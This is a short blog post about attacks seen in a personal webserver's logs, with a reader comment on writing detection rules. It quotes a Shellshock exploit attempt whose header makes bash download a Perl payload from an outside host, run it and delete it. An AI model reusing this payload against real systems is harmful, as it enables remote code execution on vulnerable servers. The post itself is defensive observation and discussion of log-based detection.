If you run a webserver chances are high that you'll get hit by random exploit-attempts. Today one of my servers has this logged - an obvious shellshock exploit attempt:
92.242.4.130 blog.steve.org.uk - [02/Dec/2014:11:50:03 +0000] \ "GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \ "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://146.71.108.154/pis ; \ curl -O http://146.71.108.154/pis;perl pis;rm -rf pis\"; node-reverse-proxy.js"
Yesterday I got hit with thousands of these referer-spam attempts:
152.237.221.99 - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1" \ 200 7425 "http://buttons-for-website.com" \ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts, fail2ban, (or even non-standard SSH ports).
For Apache/webserver exploits we have? mod_security?
I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.
Unfortunately the suggested ruleset comes from the PHP IDS project and are horribly bad.
I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else things the rules are bad - which is what I thought of hte PHP-IDS set - I guess it's hard to know.
For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.
Shame.
Tags: apache, security, webservers 14 comments
http://steve.org.uk/.
I've seen people use fail2ban against webserver logs before - but generally speaking they tend have very loose rule definitions.
If I were to publish a list of patterns I'd be very specific about what they were compared to - for example "referer", "user-agent", "request", "method", etc.